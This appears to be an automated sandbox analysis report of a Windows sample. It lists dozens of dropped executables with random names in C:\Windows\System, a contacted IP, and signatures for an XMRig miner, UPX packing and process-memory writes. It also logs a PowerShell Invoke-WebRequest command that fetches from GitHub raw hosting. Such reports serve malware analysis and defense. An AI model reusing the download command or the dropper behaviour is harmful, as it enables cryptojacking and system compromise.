C:\Windows\System\gaQJTir.exe

C:\Windows\System\pzDNvYs.exe

C:\Windows\System\pzDNvYs.exe

C:\Windows\System\LiEduUb.exe

C:\Windows\System\LiEduUb.exe

C:\Windows\System\gBIRwTw.exe

C:\Windows\System\gBIRwTw.exe

C:\Windows\System\GYuVPke.exe

C:\Windows\System\GYuVPke.exe

C:\Windows\System\lIVPKly.exe

C:\Windows\System\lIVPKly.exe

C:\Windows\System\iDTjlqT.exe

C:\Windows\System\iDTjlqT.exe

C:\Windows\System\wFcwsHT.exe

C:\Windows\System\wFcwsHT.exe

C:\Windows\System\dMBaDOK.exe

C:\Windows\System\dMBaDOK.exe

C:\Windows\System\zlInZfK.exe

C:\Windows\System\zlInZfK.exe

C:\Windows\System\LlMYiSX.exe

C:\Windows\System\LlMYiSX.exe

C:\Windows\System\gekhcVT.exe

C:\Windows\System\gekhcVT.exe

C:\Windows\System\gYhqVEZ.exe

C:\Windows\System\gYhqVEZ.exe

C:\Windows\System\VqQNuuu.exe

C:\Windows\System\VqQNuuu.exe

C:\Windows\System\sQsGwhu.exe

C:\Windows\System\sQsGwhu.exe

C:\Windows\System\fJJvksE.exe

C:\Windows\System\fJJvksE.exe

C:\Windows\System\mlmoAIt.exe

C:\Windows\System\mlmoAIt.exe

C:\Windows\System\GiyyBkV.exe

C:\Windows\System\GiyyBkV.exe

C:\Windows\System\gRmWYOU.exe

C:\Windows\System\gRmWYOU.exe

C:\Windows\System\BmShFZU.exe

C:\Windows\System\BmShFZU.exe

C:\Windows\System\eIcwEMU.exe

C:\Windows\System\eIcwEMU.exe

C:\Windows\System\bgqieJx.exe

C:\Windows\System\bgqieJx.exe

C:\Windows\System\QKEfDnk.exe

C:\Windows\System\QKEfDnk.exe

C:\Windows\System\WSweJEX.exe

C:\Windows\System\WSweJEX.exe

C:\Windows\System\lDYkwAm.exe

C:\Windows\System\lDYkwAm.exe

C:\Windows\System\yUDGlew.exe

C:\Windows\System\yUDGlew.exe

C:\Windows\System\inGluzU.exe

C:\Windows\System\inGluzU.exe

C:\Windows\System\SoaUXam.exe

C:\Windows\System\SoaUXam.exe

C:\Windows\System\kkWUPZn.exe

C:\Windows\System\kkWUPZn.exe

C:\Windows\System\qIQEbux.exe

C:\Windows\System\qIQEbux.exe

C:\Windows\System\bEfveFI.exe

C:\Windows\System\bEfveFI.exe

C:\Windows\System\MfHuHEW.exe

C:\Windows\System\MfHuHEW.exe

C:\Windows\System\bFeepmE.exe

C:\Windows\System\bFeepmE.exe

C:\Windows\System\NIwrCXE.exe

C:\Windows\System\NIwrCXE.exe

C:\Windows\System\JHNYUDQ.exe

C:\Windows\System\JHNYUDQ.exe

C:\Windows\System\lYoOBus.exe

C:\Windows\System\lYoOBus.exe

C:\Windows\System\EZclvay.exe

C:\Windows\System\EZclvay.exe

C:\Windows\System\AbGxvmx.exe

C:\Windows\System\AbGxvmx.exe

C:\Windows\System\MSRCfhF.exe

C:\Windows\System\MSRCfhF.exe

C:\Windows\System\yRwuQoJ.exe

C:\Windows\System\yRwuQoJ.exe

C:\Windows\System\jzwRfhi.exe

C:\Windows\System\jzwRfhi.exe

C:\Windows\System\thkahqY.exe

C:\Windows\System\thkahqY.exe

C:\Windows\System\UuvYEWo.exe

C:\Windows\System\UuvYEWo.exe

C:\Windows\System\cyAAUps.exe

C:\Windows\System\cyAAUps.exe

C:\Windows\System\sRVeEXC.exe

C:\Windows\System\sRVeEXC.exe

C:\Windows\System\cFeNHzy.exe

C:\Windows\System\cFeNHzy.exe

C:\Windows\System\yibZnMN.exe

C:\Windows\System\yibZnMN.exe

C:\Windows\System\VLuFCHT.exe

C:\Windows\System\VLuFCHT.exe

C:\Windows\System\BmzYtVI.exe

C:\Windows\System\BmzYtVI.exe

C:\Windows\System\qNaxpAl.exe

C:\Windows\System\qNaxpAl.exe

C:\Windows\System\DfXkYpn.exe

C:\Windows\System\DfXkYpn.exe

C:\Windows\System\sjTBQuQ.exe

C:\Windows\System\sjTBQuQ.exe

C:\Windows\System\SnxtlEW.exe

C:\Windows\System\SnxtlEW.exe

C:\Windows\System\ZkZPRbn.exe

C:\Windows\System\ZkZPRbn.exe

C:\Windows\System\jGlWWKX.exe

C:\Windows\System\jGlWWKX.exe

C:\Windows\System\TlImBLZ.exe

C:\Windows\System\TlImBLZ.exe

C:\Windows\System\TIseekd.exe

C:\Windows\System\TIseekd.exe

C:\Windows\System\dUfBytv.exe

C:\Windows\System\dUfBytv.exe

C:\Windows\System\xcxJudU.exe

C:\Windows\System\xcxJudU.exe

C:\Windows\System\EgfhJBv.exe

C:\Windows\System\EgfhJBv.exe

C:\Windows\System\RFkUPDh.exe

C:\Windows\System\RFkUPDh.exe

C:\Windows\System\iAXyFgx.exe

C:\Windows\System\iAXyFgx.exe

C:\Windows\System\cMyohae.exe

C:\Windows\System\cMyohae.exe

C:\Windows\System\WeShyJS.exe

C:\Windows\System\WeShyJS.exe

C:\Windows\System\PXJbcLr.exe

C:\Windows\System\PXJbcLr.exe

C:\Windows\System\YlEUopR.exe

C:\Windows\System\YlEUopR.exe

C:\Windows\System\NXziiwP.exe

C:\Windows\System\NXziiwP.exe

C:\Windows\System\ZDqcezG.exe

C:\Windows\System\ZDqcezG.exe

C:\Windows\System\lLIIdqN.exe

C:\Windows\System\lLIIdqN.exe

C:\Windows\System\llghmFk.exe

C:\Windows\System\llghmFk.exe

C:\Windows\System\hWIbVbS.exe

C:\Windows\System\hWIbVbS.exe

C:\Windows\System\mGwjzrB.exe

C:\Windows\System\mGwjzrB.exe

C:\Windows\System\JvscBbT.exe

C:\Windows\System\JvscBbT.exe

C:\Windows\System\mWgWoKh.exe

C:\Windows\System\mWgWoKh.exe

C:\Windows\System\mwhymYA.exe

C:\Windows\System\mwhymYA.exe

C:\Windows\System\PVxAsKP.exe

C:\Windows\System\PVxAsKP.exe

C:\Windows\System\RRhABfQ.exe

C:\Windows\System\RRhABfQ.exe

C:\Windows\System\OEKeTip.exe

C:\Windows\System\OEKeTip.exe

C:\Windows\System\mNZMbHr.exe

C:\Windows\System\mNZMbHr.exe

C:\Windows\System\PjajqsK.exe

C:\Windows\System\PjajqsK.exe

C:\Windows\System\fXXFedG.exe

C:\Windows\System\fXXFedG.exe

C:\Windows\System\rCVBGZR.exe

C:\Windows\System\rCVBGZR.exe

C:\Windows\System\GyfNshL.exe

C:\Windows\System\GyfNshL.exe

C:\Windows\System\YSNJEeI.exe

C:\Windows\System\YSNJEeI.exe

C:\Windows\System\ymaYbdg.exe

C:\Windows\System\ymaYbdg.exe

C:\Windows\System\yETiJbN.exe

C:\Windows\System\yETiJbN.exe

C:\Windows\System\qaUifMq.exe

C:\Windows\System\qaUifMq.exe

C:\Windows\System\EObutGR.exe

C:\Windows\System\EObutGR.exe

C:\Windows\System\FTWVnBz.exe

C:\Windows\System\FTWVnBz.exe

C:\Windows\System\BfLyUSn.exe

C:\Windows\System\BfLyUSn.exe

C:\Windows\System\uTKaMwS.exe

C:\Windows\System\uTKaMwS.exe

C:\Windows\System\aQcPADT.exe

C:\Windows\System\aQcPADT.exe

C:\Windows\System\dgZLgKq.exe

C:\Windows\System\dgZLgKq.exe

C:\Windows\System\fWyMhNY.exe

C:\Windows\System\fWyMhNY.exe

C:\Windows\System\eHHqiAB.exe

C:\Windows\System\eHHqiAB.exe

C:\Windows\System\binWwtH.exe

C:\Windows\System\binWwtH.exe

C:\Windows\System\qYJonkc.exe

C:\Windows\System\qYJonkc.exe

C:\Windows\System\czsotCh.exe

C:\Windows\System\czsotCh.exe

C:\Windows\System\hGnczLd.exe

C:\Windows\System\hGnczLd.exe

C:\Windows\System\sZWcRCr.exe

C:\Windows\System\sZWcRCr.exe

C:\Windows\System\whRWKyC.exe

C:\Windows\System\whRWKyC.exe

C:\Windows\System\klQxAsq.exe

C:\Windows\System\klQxAsq.exe

C:\Windows\System\QuBzpAV.exe

C:\Windows\System\QuBzpAV.exe

C:\Windows\System\amUNPlJ.exe

C:\Windows\System\amUNPlJ.exe

C:\Windows\System\lZgHIuk.exe

C:\Windows\System\lZgHIuk.exe

C:\Windows\System\qNyFGdi.exe

C:\Windows\System\qNyFGdi.exe

C:\Windows\System\jOODhpQ.exe

C:\Windows\System\jOODhpQ.exe

C:\Windows\System\vOkxtoA.exe

C:\Windows\System\vOkxtoA.exe

C:\Windows\System\glNkMDf.exe

C:\Windows\System\glNkMDf.exe

C:\Windows\System\OlBRjfn.exe

C:\Windows\System\OlBRjfn.exe

C:\Windows\System\DKBcWqY.exe

C:\Windows\System\DKBcWqY.exe

C:\Windows\System\ZCLzSmN.exe

C:\Windows\System\ZCLzSmN.exe

C:\Windows\System\dlSOMnA.exe

C:\Windows\System\dlSOMnA.exe

C:\Windows\System\BSMyALi.exe

C:\Windows\System\BSMyALi.exe

C:\Windows\System\jTwmPQc.exe

C:\Windows\System\jTwmPQc.exe

C:\Windows\System\RiekOix.exe

C:\Windows\System\RiekOix.exe

C:\Windows\System\zfXELDz.exe

C:\Windows\System\zfXELDz.exe

C:\Windows\System\PBtzCef.exe

C:\Windows\System\PBtzCef.exe

C:\Windows\System\KpkrQqe.exe

C:\Windows\System\KpkrQqe.exe

C:\Windows\System\sAQKotd.exe

C:\Windows\System\sAQKotd.exe

C:\Windows\System\dKbmDsT.exe

C:\Windows\System\dKbmDsT.exe

C:\Windows\System\jrgxZVk.exe

C:\Windows\System\jrgxZVk.exe

C:\Windows\System\EclswgF.exe

C:\Windows\System\EclswgF.exe

C:\Windows\System\wdbBIDD.exe

C:\Windows\System\wdbBIDD.exe

C:\Windows\System\xgAzklP.exe

C:\Windows\System\xgAzklP.exe

C:\Windows\System\hxdNaKJ.exe

C:\Windows\System\hxdNaKJ.exe

C:\Windows\System\diwvlJJ.exe

C:\Windows\System\diwvlJJ.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:35

Reported

2024-05-22 20:38

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 13248 created 4104 N/A C:\Windows\system32\WerFaultSecure.exe C:\Windows\system32\svchost.exe

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFaultSecure.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFaultSecure.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\TZCAEHl.exe
PID 208 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\TZCAEHl.exe
PID 208 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\YAnlios.exe
PID 208 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\YAnlios.exe
PID 208 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\mTuDxUL.exe
PID 208 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\mTuDxUL.exe
PID 208 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zSPoBFR.exe
PID 208 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zSPoBFR.exe
PID 208 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\CmdKrOa.exe
PID 208 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\CmdKrOa.exe
PID 208 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ivvBPaY.exe
PID 208 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ivvBPaY.exe
PID 208 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zMedrBD.exe
PID 208 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zMedrBD.exe
PID 208 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\vIAhSLq.exe
PID 208 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\vIAhSLq.exe
PID 208 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jUMVpNd.exe
PID 208 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jUMVpNd.exe
PID 208 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uFEkMbr.exe
PID 208 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uFEkMbr.exe
PID 208 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\RTqRbLm.exe
PID 208 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\RTqRbLm.exe
PID 208 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\UnNFDEl.exe
PID 208 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\UnNFDEl.exe
PID 208 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\VbSEeme.exe
PID 208 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\VbSEeme.exe
PID 208 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jJIBQXE.exe
PID 208 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jJIBQXE.exe
PID 208 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\EymKlZn.exe
PID 208 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\EymKlZn.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\VxPVlCi.exe

C:\Windows\System\VxPVlCi.exe

C:\Windows\System\bUrlURo.exe

C:\Windows\System\bUrlURo.exe

C:\Windows\System\bVstZTV.exe

C:\Windows\System\bVstZTV.exe

C:\Windows\System\IXQbuCs.exe

C:\Windows\System\IXQbuCs.exe

C:\Windows\System\naspEzO.exe

C:\Windows\System\naspEzO.exe

C:\Windows\System\YpTOTMn.exe

C:\Windows\System\YpTOTMn.exe

C:\Windows\System\xQJuSjb.exe

C:\Windows\System\xQJuSjb.exe

C:\Windows\System\jCXcdBi.exe

C:\Windows\System\jCXcdBi.exe

C:\Windows\System\zORALho.exe

C:\Windows\System\zORALho.exe

C:\Windows\System\PFJNExo.exe

C:\Windows\System\PFJNExo.exe

C:\Windows\System\GnnFObu.exe

C:\Windows\System\GnnFObu.exe

C:\Windows\System\hPlHvaU.exe

C:\Windows\System\hPlHvaU.exe

C:\Windows\System\iOmevag.exe

C:\Windows\System\iOmevag.exe

C:\Windows\System\aapCKuM.exe

C:\Windows\System\aapCKuM.exe

C:\Windows\System\cZxPTwf.exe

C:\Windows\System\cZxPTwf.exe

C:\Windows\System\emKgSAl.exe

C:\Windows\System\emKgSAl.exe

C:\Windows\System\TaRXDiP.exe

C:\Windows\System\TaRXDiP.exe

C:\Windows\System\rhQDEZJ.exe

C:\Windows\System\rhQDEZJ.exe

C:\Windows\System\YgCbHvV.exe

C:\Windows\System\YgCbHvV.exe

C:\Windows\System\fQHEhEK.exe

C:\Windows\System\fQHEhEK.exe

C:\Windows\System\qFHaixg.exe

C:\Windows\System\qFHaixg.exe

C:\Windows\System\PXZnaWD.exe

C:\Windows\System\PXZnaWD.exe

C:\Windows\System\ewtnVKh.exe

C:\Windows\System\ewtnVKh.exe

C:\Windows\System\xUhxTCh.exe

C:\Windows\System\xUhxTCh.exe

C:\Windows\System\npCQCDf.exe

C:\Windows\System\npCQCDf.exe

C:\Windows\System\beMpHLR.exe

C:\Windows\System\beMpHLR.exe

C:\Windows\System\XwOtIrB.exe

C:\Windows\System\XwOtIrB.exe

C:\Windows\System\tWGbONI.exe

C:\Windows\System\tWGbONI.exe

C:\Windows\System\LpFcXGb.exe

C:\Windows\System\LpFcXGb.exe

C:\Windows\System\yoCJZay.exe

C:\Windows\System\yoCJZay.exe

C:\Windows\System\YXBwFWa.exe

C:\Windows\System\YXBwFWa.exe

C:\Windows\System\rDFUhSH.exe

C:\Windows\System\rDFUhSH.exe

C:\Windows\System\jfysvmv.exe

C:\Windows\System\jfysvmv.exe

C:\Windows\System\NadHrNr.exe

C:\Windows\System\NadHrNr.exe

C:\Windows\System\eFkEvrt.exe

C:\Windows\System\eFkEvrt.exe

C:\Windows\System\tudTwjt.exe

C:\Windows\System\tudTwjt.exe

C:\Windows\System\BuwgZtI.exe

C:\Windows\System\BuwgZtI.exe

C:\Windows\System\nUzoRti.exe

C:\Windows\System\nUzoRti.exe

C:\Windows\System\PzLyiwR.exe

C:\Windows\System\PzLyiwR.exe

C:\Windows\System\NpiZJUx.exe

C:\Windows\System\NpiZJUx.exe

C:\Windows\System\LerOXCG.exe

C:\Windows\System\LerOXCG.exe

C:\Windows\System\MrjoqrT.exe

C:\Windows\System\MrjoqrT.exe

C:\Windows\System\FYgmzAP.exe

C:\Windows\System\FYgmzAP.exe

C:\Windows\System\laTtOQw.exe

C:\Windows\System\laTtOQw.exe

C:\Windows\System\ACUDbBj.exe

C:\Windows\System\ACUDbBj.exe

C:\Windows\System\KWTnpvO.exe

C:\Windows\System\KWTnpvO.exe

C:\Windows\System\yCPnFpA.exe

C:\Windows\System\yCPnFpA.exe

C:\Windows\System\jRQuMiU.exe

C:\Windows\System\jRQuMiU.exe

C:\Windows\System\jHCbpkd.exe

C:\Windows\System\jHCbpkd.exe

C:\Windows\System\PnDcDkb.exe

C:\Windows\System\PnDcDkb.exe

C:\Windows\System\cfnvqOA.exe

C:\Windows\System\cfnvqOA.exe

C:\Windows\System\oExYHRC.exe

C:\Windows\System\oExYHRC.exe

C:\Windows\System\oktzcOO.exe

C:\Windows\System\oktzcOO.exe

C:\Windows\System\wwPSHsm.exe

C:\Windows\System\wwPSHsm.exe

C:\Windows\System\sfZaJhf.exe

C:\Windows\System\sfZaJhf.exe

C:\Windows\System\PZIlvDK.exe

C:\Windows\System\PZIlvDK.exe

C:\Windows\System\lpCgRgF.exe

C:\Windows\System\lpCgRgF.exe

C:\Windows\System\TiacXae.exe

C:\Windows\System\TiacXae.exe

C:\Windows\System\dhafaLJ.exe

C:\Windows\System\dhafaLJ.exe

C:\Windows\System\fyEuXQa.exe

C:\Windows\System\fyEuXQa.exe

C:\Windows\System\rrLTFYI.exe

C:\Windows\System\rrLTFYI.exe

C:\Windows\System\GRfUAMd.exe

C:\Windows\System\GRfUAMd.exe

C:\Windows\System\DXWopsk.exe

C:\Windows\System\DXWopsk.exe

C:\Windows\System\JHQElZS.exe

C:\Windows\System\JHQElZS.exe

C:\Windows\System\dKqObyy.exe

C:\Windows\System\dKqObyy.exe

C:\Windows\System\nvvyMbb.exe

C:\Windows\System\nvvyMbb.exe

C:\Windows\System\oVvBRyo.exe

C:\Windows\System\oVvBRyo.exe

C:\Windows\System\zYqIDFi.exe

C:\Windows\System\zYqIDFi.exe

C:\Windows\System\akncSwJ.exe

C:\Windows\System\akncSwJ.exe

C:\Windows\System\hvUhTDH.exe

C:\Windows\System\hvUhTDH.exe

C:\Windows\System\yyiJkWw.exe

C:\Windows\System\yyiJkWw.exe

C:\Windows\System\xaldrHy.exe

C:\Windows\System\xaldrHy.exe

C:\Windows\System\eigTUGb.exe

C:\Windows\System\eigTUGb.exe

C:\Windows\System\irYXwWZ.exe

C:\Windows\System\irYXwWZ.exe

C:\Windows\System\AOwHBot.exe

C:\Windows\System\AOwHBot.exe

C:\Windows\System\KESpGVS.exe

C:\Windows\System\KESpGVS.exe

C:\Windows\System\xCszBkh.exe

C:\Windows\System\xCszBkh.exe

C:\Windows\System\kAiRvJO.exe

C:\Windows\System\kAiRvJO.exe

C:\Windows\System\jNnZzxc.exe

C:\Windows\System\jNnZzxc.exe

C:\Windows\System\CrQuqOa.exe

C:\Windows\System\CrQuqOa.exe

C:\Windows\System\CYCrqMS.exe

C:\Windows\System\CYCrqMS.exe

C:\Windows\System\WeDxtHw.exe

C:\Windows\System\WeDxtHw.exe

C:\Windows\System\jBROrth.exe

C:\Windows\System\jBROrth.exe

C:\Windows\System\XoKCoNY.exe

C:\Windows\System\XoKCoNY.exe

C:\Windows\System\MMkjkdq.exe

C:\Windows\System\MMkjkdq.exe

C:\Windows\System\yKgHpGt.exe

C:\Windows\System\yKgHpGt.exe

C:\Windows\System\mjHVRYs.exe

C:\Windows\System\mjHVRYs.exe

C:\Windows\System\KjRzUyz.exe

C:\Windows\System\KjRzUyz.exe

C:\Windows\System\dkLseap.exe

C:\Windows\System\dkLseap.exe

C:\Windows\System\htpiZjk.exe

C:\Windows\System\htpiZjk.exe

C:\Windows\System\WGAHqVS.exe

C:\Windows\System\WGAHqVS.exe

C:\Windows\System\YwMVUTw.exe

C:\Windows\System\YwMVUTw.exe

C:\Windows\System\kFELYKx.exe

C:\Windows\System\kFELYKx.exe

C:\Windows\System\xnzjwIM.exe

C:\Windows\System\xnzjwIM.exe

C:\Windows\System\PRCOZHS.exe

C:\Windows\System\PRCOZHS.exe

C:\Windows\System\IJyIKPB.exe

C:\Windows\System\IJyIKPB.exe

C:\Windows\System\QfBFXhp.exe

C:\Windows\System\QfBFXhp.exe

C:\Windows\System\qjhzGFv.exe

C:\Windows\System\qjhzGFv.exe

C:\Windows\System\fitVTnD.exe

C:\Windows\System\fitVTnD.exe

C:\Windows\System\wwLaKgL.exe

C:\Windows\System\wwLaKgL.exe

C:\Windows\System\nIhXbft.exe

C:\Windows\System\nIhXbft.exe

C:\Windows\System\VMQCMgE.exe

C:\Windows\System\VMQCMgE.exe

C:\Windows\System\GFBhAkk.exe

C:\Windows\System\GFBhAkk.exe

C:\Windows\System\kZeDYEA.exe

C:\Windows\System\kZeDYEA.exe

C:\Windows\System\GGoHllw.exe

C:\Windows\System\GGoHllw.exe

C:\Windows\System\OkUaFku.exe

C:\Windows\System\OkUaFku.exe

C:\Windows\System\MqRTBIw.exe

C:\Windows\System\MqRTBIw.exe

C:\Windows\System\kzNDhwN.exe

C:\Windows\System\kzNDhwN.exe

C:\Windows\System\AfeCvOk.exe

C:\Windows\System\AfeCvOk.exe

C:\Windows\System\EcJHMfr.exe

C:\Windows\System\EcJHMfr.exe

C:\Windows\System\ictfnkJ.exe

C:\Windows\System\ictfnkJ.exe

C:\Windows\System\tUajrUf.exe

C:\Windows\System\tUajrUf.exe

C:\Windows\System\YzMyeKi.exe

C:\Windows\System\YzMyeKi.exe

C:\Windows\System\MCaMhZD.exe

C:\Windows\System\MCaMhZD.exe

C:\Windows\System\HRcffef.exe

C:\Windows\System\HRcffef.exe

C:\Windows\System\QykwLoF.exe

C:\Windows\System\QykwLoF.exe

C:\Windows\System\ZDnltHu.exe

C:\Windows\System\ZDnltHu.exe

C:\Windows\System\EuqEobm.exe

C:\Windows\System\EuqEobm.exe

C:\Windows\System\eRMgqMs.exe

C:\Windows\System\eRMgqMs.exe

C:\Windows\System\FNmQNwf.exe

C:\Windows\System\FNmQNwf.exe

C:\Windows\System\iRleuRD.exe

C:\Windows\System\iRleuRD.exe

C:\Windows\System\woJRKmb.exe

C:\Windows\System\woJRKmb.exe

C:\Windows\System\fFAJvhD.exe

C:\Windows\System\fFAJvhD.exe

C:\Windows\System\cADvJiB.exe

C:\Windows\System\cADvJiB.exe

C:\Windows\System\IBJpnqK.exe

C:\Windows\System\IBJpnqK.exe

C:\Windows\System\NVuMEwz.exe

C:\Windows\System\NVuMEwz.exe

C:\Windows\System\qyWhnjc.exe

C:\Windows\System\qyWhnjc.exe

C:\Windows\System\gPNDoOk.exe

C:\Windows\System\gPNDoOk.exe

C:\Windows\System\kFEWSEA.exe

C:\Windows\System\kFEWSEA.exe

C:\Windows\System\RNjUUWr.exe

C:\Windows\System\RNjUUWr.exe

C:\Windows\System\mmTfiDS.exe

C:\Windows\System\mmTfiDS.exe

C:\Windows\System\eIXIPUU.exe

C:\Windows\System\eIXIPUU.exe

C:\Windows\System\HulrEyN.exe

C:\Windows\System\HulrEyN.exe

C:\Windows\System\tVfqxmn.exe

C:\Windows\System\tVfqxmn.exe

C:\Windows\System\YnBgNPF.exe

C:\Windows\System\YnBgNPF.exe

C:\Windows\System\cyMBfBQ.exe

C:\Windows\System\cyMBfBQ.exe

C:\Windows\System\prkxHeJ.exe

C:\Windows\System\prkxHeJ.exe

C:\Windows\System\SQiFTvW.exe

C:\Windows\System\SQiFTvW.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2156" "2908" "2844" "2912" "0" "0" "2916" "0" "0" "0" "0" "0"

C:\Windows\system32\WerFaultSecure.exe

